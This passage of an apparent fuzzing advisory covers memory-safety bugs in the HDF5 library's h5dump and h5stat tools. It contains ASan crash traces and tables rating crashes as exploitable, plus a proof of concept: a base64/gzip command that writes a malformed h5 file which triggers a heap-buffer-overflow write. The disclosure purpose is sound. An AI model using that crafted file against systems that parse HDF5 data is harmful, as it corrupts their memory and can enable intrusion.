    #25 0x5568d72adbe4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #26 0x5568d72a61c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #27 0x7f4b60e30d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
    #28 0x5568d72a8649  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)

0x602000005b40 is located 0 bytes to the right of 16-byte region [0x602000005b30,0x602000005b40)
allocated by thread T0 here:
    #0 0x7f4b61c87e8f in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x7f4b615acf5a in H5O__fill_copy /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Ofill.c:568
    #2 0x7f4b615d4882 in H5O_msg_copy /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Omessage.c:722
    #3 0x7f4b615f98e5 in H5P__dcrt_fill_value_copy /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Pdcpl.c:1274
    #4 0x7f4b61658c16 in H5P_copy_plist /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Pint.c:1004
    #5 0x7f4b6130d00f in H5D_get_create_plist /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dint.c:3569
    #6 0x7f4b618ca8a4 in H5VL__native_dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:466
    #7 0x7f4b6189bcfa in H5VL__dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2426
    #8 0x7f4b6189bcfa in H5VL_dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2457
    #9 0x7f4b6128f1e6 in H5Dget_create_plist /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:776
    #10 0x5568d72ae733  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29733)
    #11 0x5568d72b7947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #12 0x7f4b6147314e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #13 0x7f4b6147314e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #14 0x7f4b61484212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #15 0x7f4b611fe721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #16 0x7f4b6120205e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #17 0x7f4b61492c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #18 0x7f4b6148b3d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #19 0x7f4b61475d71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #20 0x7f4b6152dc0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #21 0x7f4b618d5455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #22 0x7f4b618ac095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #23 0x7f4b618ac095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #24 0x7f4b6151961a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #25 0x7f4b6151961a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #26 0x5568d72adbe4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #27 0x5568d72a61c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #28 0x7f4b60e30d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778 in __interceptor_memset
Shadow bytes around the buggy address:
  0x0c047fff8b10: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
  0x0c047fff8b20: fa fa fd fa fa fa 00 03 fa fa 00 04 fa fa fd fd
  0x0c047fff8b30: fa fa fd fd fa fa fd fa fa fa 00 fa fa fa fd fa
  0x0c047fff8b40: fa fa 00 fa fa fa fd fa fa fa 00 fa fa fa fd fa
  0x0c047fff8b50: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 04 fa
=>0x0c047fff8b60: fa fa 04 fa fa fa 00 00[fa]fa fa fa fa fa fa fa
  0x0c047fff8b70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8b80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8b90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1090==ABORTING

H5T__conv_struct_opt Heap Buffer Overflow

Details

The following write-based heap overflow was found by fuzzing the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger an out-of-bounds write in the H5T__conv_struct_opt method. An attacker who can control an h5 file or other hdf5 data parsed by a target system can trigger the heap-overflow.

PoC

The following PoC shows the ASAN output detailing the heap-overflow location.

$ echo "H4sICAIuv2QAA2U5MmQ2YTY2Y2NlYjgyNGUzZmJmOTY5MGRlNGRmZDVkAOv0cHHj5ZLiYgABDg4GFgYBBmYGBPgPBRIcqHyY/A4mBhzgLViVh6tjAIhnABVVgNINbNh1wUwOCXJ1ZWBghNuHbq8FK4TmwDDgOTZTP2O3rQNE/MLlAxygnkT1eMEC0oxnR+XeQ+awkmbzf5L88Z+wEgoAE4MDbpv//3+CKcoI1MPIAk9PAoLAdMsIZMyAyidgqGcDyXOAFYE0ACEIbICmwwxGmDoBKP3//1Mg/Q+qnw8kDrTMyAAITA0tDU1NTEwNQQZKgI1kZAKRD/7/gGYeUIaCuG0CpuPfQBIyE9z1OD2PFzzFFPrfiSn0vx4WeQ2SDPJYTfpg79hgDKRPHAJip4BGZmgwNdhD5B/YO81GyBtMN2aAZPsGh1AwuGrvDOZD5EFykGAQcITov2DvgiQPCnIWiH6jWTNB4KS9K0T+4AuofkhiPuEIMf+ovRuSfhALEm0CTpNUPIHokL07TD7lhBPIbkhGcQGzGW4csPdAsx9SbjQ4yRwvBKI99p5o7ucE8xc5gd1XvdPeC0leE1j8BPv5uzACQwlW/rxALgdJLVFwASmQE8nS+QdEvMMUl6XANUjgJ8k6+AnIOxYVJVb6dwaXFJU2MJQWpRZDxaHZEp5FmBkSGEFiYsAEZAukE+PzEnNTCdkOzO3asDSnwJAE1cNCQJeggvxvZqgecQ4G8XwgKxmqF6PewdBrD1XjwGDCzWCKZADEN8gGoGZKRjEmcKlXn5yRWITsvaf/sZXCiXCWMBDLCcsxJILCEqgRHnhoAJxUYYVCCtA18vIMPEj+BFVwAKDQPF0YCAAA" | base64 -d | gunzip -c > e92d6a66cceb824e3fbf9690de4dfd5d
$ ./hdf5/bin/h5dump ./e92d6a66cceb824e3fbf9690de4dfd5d
HDF5 "./e92d6a66cceb824e3fbf9690de4dfd5d" {
GROUP "/" {
   DATASET "ArrayO�Stru�" {
      DATATYPE  H5T_COMPOUND {
         32-bit big-endian integer 32-bit precision "a_name";
         24-bit little-endian floating-point 32-bit precision "b_name";
         64-bit little-endian floating-point 64-bit precision "c_name";
         H5T_COMPOUND {
            H5T_STRING {
               STRSIZE 1970974;
               STRPAD H5T_STR_NULLTERM;
               CSET H5T_CSET_ASCII;
               CTYPE H5T_C_S1;
            } "char_name";
            96-bit big-endian integer 32-bit precision "array_na";
         } "o";
      }
      DATASPACE  SCALAR
=================================================================
==968==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f1d2521ab40 at pc 0x7f1d299fc469 bp 0x7ffd71677900 sp 0x7ffd716770b0
WRITE of size 1970980 at 0x7f1d2521ab40 thread T0
    #0 0x7f1d299fc468 in __interceptor_memmove ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789
    #1 0x7f1d29557f58 in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2642
    #2 0x7f1d2952387a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #3 0x7f1d29558171 in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2586
    #4 0x7f1d2952387a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #5 0x7f1d29105b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
    #6 0x7f1d290c3221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
    #7 0x7f1d290f95d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
    #8 0x7f1d296aeee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #9 0x7f1d2967eafc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #10 0x7f1d2967eafc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #11 0x7f1d2906da0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #12 0x7f1d29075444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #13 0x556692a2546c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #14 0x556692a3a18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #15 0x5566929f3c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #16 0x5566929fc947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #17 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #18 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #19 0x7f1d29269212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #20 0x7f1d28fe3721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #21 0x7f1d28fe705e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #22 0x7f1d29277c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #23 0x7f1d292703d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #24 0x7f1d2925ad71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #25 0x7f1d29312c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #26 0x7f1d296ba455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #27 0x7f1d29691095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #28 0x7f1d29691095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #29 0x7f1d292fe61a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #30 0x7f1d292fe61a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #31 0x5566929f2be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #32 0x5566929eb1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #33 0x7f1d28c15d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
    #34 0x5566929ed649  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)

0x7f1d2521ab40 is located 0 bytes to the right of 1971008-byte region [0x7f1d25039800,0x7f1d2521ab40)
allocated by thread T0 here:
    #0 0x7f1d29a6ce8f in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x7f1d292162ef in H5FL__malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:237
    #2 0x7f1d292174f3 in H5FL_blk_malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:888
    #3 0x7f1d290f6fa3 in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1447
    #4 0x7f1d290f941b in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:424
    #5 0x7f1d290f941b in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:305
    #6 0x7f1d296aeee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #7 0x7f1d2967eafc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #8 0x7f1d2967eafc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #9 0x7f1d2906da0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #10 0x7f1d29075444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #11 0x556692a2546c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #12 0x556692a3a18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #13 0x5566929f3c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #14 0x5566929fc947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #15 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #16 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #17 0x7f1d29269212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #18 0x7f1d28fe3721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #19 0x7f1d28fe705e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #20 0x7f1d29277c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #21 0x7f1d292703d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #22 0x7f1d2925ad71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #23 0x7f1d29312c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #24 0x7f1d296ba455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #25 0x7f1d29691095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #26 0x7f1d29691095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #27 0x7f1d292fe61a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #28 0x7f1d292fe61a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #29 0x5566929f2be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #30 0x5566929eb1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #31 0x7f1d28c15d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
Shadow bytes around the buggy address:
  0x0fe424a3b510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe424a3b520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe424a3b530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe424a3b540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe424a3b550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe424a3b560: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
  0x0fe424a3b570: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe424a3b580: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe424a3b590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe424a3b5a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe424a3b5b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==968==ABORTING

H5Stat Fuzzing

The following crashes were discovered by fuzzing the h5stat utility with AFL++.

Filename Summary ASAN Summary
30b688e7cbe565ec986c71489d772f84 READ of size 1 in H5F_get_checksums SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Fio.c:556 in H5F_get_checksums
317b9d862750b238f6eeacb04171e075 Invalid READ memory access on unknown address 0x000000000008 SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:7495 in H5VL_blob_specific
36733df20ddc97273a6363f88815e7a7 Stack overflow caused by an infinite loop and stack exhaustion SUMMARY: AddressSanitizer: stack-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Oshared.c:304 in H5O__shared_decode
367649861c56b0b2ee497bb8ef42ae0e READ of size 18 in H5T__conv_ref /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3780 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:806 in __interceptor_memcpy
39a0e73f7d0f7e396ccb09e826083bc2 Floating point error SUMMARY: AddressSanitizer: FPE /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Dchunk.c:695 in H5D__chunk_set_info_real
4512b0fa12719efa790f5aac035f3e71 WRITE of size 64 in H5T__ref_mem_setnull /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tref.c:394 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778 in __interceptor_memset
57846c4fd17ff9378f0a44eaef3d5a11 negative-size-param: (size=-1) in H5O__link_decode /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Olink.c:209 SUMMARY: AddressSanitizer: negative-size-param ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:806 in __interceptor_memcpy
76a27427f63a1ca8e7b9acade505c983 Stack overflow caused by an infinite loop and stack exhaustion in in H5B__get_info_helper /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5B.c:1918 SUMMARY: AddressSanitizer: stack-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5C.c:2031 in H5C_protect
8ebfabca399c9882144390c2824a9956 Stack oveflow caused by an infinite loop and stack exhaustion in H5G__visit_cb /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Gint.c:1100 SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/asan/asan_stack.cpp:57 in __sanitizer::BufferedStackTrace::UnwindImpl(unsigned long, unsigned long, void*, bool, unsigned int)
a8bf502b9051d547760292a54908d0de READ of size 272 in H5D__btree_idx_iterate_cb /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Dbtree.c:1047 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:806 in __interceptor_memcpy
b3358eb6912b440e85afbf1eaf8aab37 Stack overflow caused by an infinite loop and stack exhaustion in in H5O__dtype_shared_decode /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Oshared.h:60 SUMMARY: AddressSanitizer: stack-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Omessage.c:488 in H5O_msg_read_oh
cc5fc6037ddcd3d5597e49a12e3ddf9d Floating point error SUMMARY: AddressSanitizer: FPE /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5T.c:3602 in H5T__complete_copy
e008d3608912f88ae83aebe70689dcdf READ of size 8 located 24 bytes to the right of global variable 'FS_STRATEGY_NAME' defined in 'h5stat.c:38:13' SUMMARY: AddressSanitizer: global-buffer-overflow (/home/doi/src/triage/hdf5-1.14.1-2-ASAN/hdf5/bin/h5stat+0x1df8e)
f93c69013478b5b9eab33f7412e947d1 Stack overflow caused by an infinite loop and stack exhaustion in H5E__push_stack /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Eint.c:765 SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/asan/asan_thread.cpp:410 in __asan::GetCurrentThread()
ffb3610ce23ccaed3c1d45ce5c17f47b Stack overflow caused by an infinite loop and stack exhaustion SUMMARY: AddressSanitizer: stack-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Oshared.c:304 in H5O__shared_decode

Further research regarding the practical exploitability of these issues was not performed. The following table details the output of the GDB Exploitable plugin, which has been included as an additional data point and is not intended to be used as commentary around real-world exploitability.

Filename Exploitability Explanation
367649861c56b0b2ee497bb8ef42ae0e UNKNOWN The target crashed due to an access violation but there is not enough additional information available to determine exploitability.
39a0e73f7d0f7e396ccb09e826083bc2 PROBABLY_NOT_EXPLOITABLE The target crashed on a floating point exception. This may indicate a division by zero or a number of other floating point errors. It is generally difficult to leverage these types of errors to gain control of the processor.
4512b0fa12719efa790f5aac035f3e71 PROBABLY_NOT_EXPLOITABLE The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation, which may mean the application crashed on a simple NULL dereference to data structure that has no immediate effect on control of the processor.
57846c4fd17ff9378f0a44eaef3d5a11 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
76a27427f63a1ca8e7b9acade505c983 EXPLOITABLE GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior's process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable.
8ebfabca399c9882144390c2824a9956 UNKNOWN The target crashed due to an access violation but there is not enough additional information available to determine exploitability.
a8bf502b9051d547760292a54908d0de EXPLOITABLE The target crashed on a branch instruction, which may indicate that the control flow is tainted.
b3358eb6912b440e85afbf1eaf8aab37 EXPLOITABLE GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior's process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable.
cc5fc6037ddcd3d5597e49a12e3ddf9d PROBABLY_NOT_EXPLOITABLE The target crashed on a floating point exception. This may indicate a division by zero or a number of other floating point errors. It is generally difficult to leverage these types of errors to gain control of the processor.
e008d3608912f88ae83aebe70689dcdf UNKNOWN The target crashed due to an access violation but there is not enough additional information available to determine exploitability.
f93c69013478b5b9eab33f7412e947d1 EXPLOITABLE GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior's process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable.
ffb3610ce23ccaed3c1d45ce5c17f47b EXPLOITABLE GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior's process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable.

H5Dump Fuzzing

h5dump was fuzzed using the h5stat-input-corpus.tar.gz input corpus. The h5dump utility was not initially selected for fuzzing due to slower run times and issues with fuzzed test cases resulting in memory exhaustion and infinite loop conditions. These issues contributed to fewer total fuzzed test case executions against h5dump, and 10 million total test cases were executed. At the conclusion of testing, AFL++ was still finding new code paths and crashes. This indicates further issues are likely to be identified by continued fuzzing of h5dump.

A total of 89 unique memory corruption issues were discovered in h5dump based on stack major hashes. The following tables details the 35 memory corruption issues in h5dump which were classified by the exploitable plugin as exploitable, or potentially exploitable, for brevity. As with the h5stat tables above, this is not intended to provide commentary around real-world exploitability.

Filename Exploitability Explanation
07d6b324b8474a569ce13b34d919e125 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
0c9d1718599c629f6ae2dc253e9f556c EXPLOITABLE The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable.
0e71c9cac751ed2550aee102e2956181 EXPLOITABLE The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable.
0e847373645d83c271065efc23814701 PROBABLY_EXPLOITABLE The target crashed during a block move, which may indicate that the attacker can control a buffer overflow.
11049a56a4235093e6845a27021af15e PROBABLY_EXPLOITABLE The target crashed during a block move, which may indicate that the attacker can control a buffer overflow.
161b33e54715856dee6cc2036046d00b EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
21fcde769605d7419d5ddd86bcb2c0ab EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
2b99439e944dd50e495b73506a80c7cb PROBABLY_EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control write address and/or value. However, it there is a chance it could be a NULL dereference.
2c39afc2cd6c7e4a43a6133681d1284f EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
2ca00f445e035ee71f6efb7a0ed388dc PROBABLY_EXPLOITABLE The target crashed during a block move, which may indicate that the attacker can control a buffer overflow.
38344f8077c3bdcc40d4c88cf1b67086 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
4030f62b172d41bffcaea19c3563f2d6 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
47a6f97d7f311db2fd03345389950c1b EXPLOITABLE The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable.
56351b62615dd0aee14cfff22670150b PROBABLY_EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control write address and/or value. However, it there is a chance it could be a NULL dereference.
56707228c5602b4f9032e5c5076ae951 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
6ad05b7df38db254d21dfc55bf055948 EXPLOITABLE The target crashed on a branch instruction, which may indicate that the control flow is tainted.
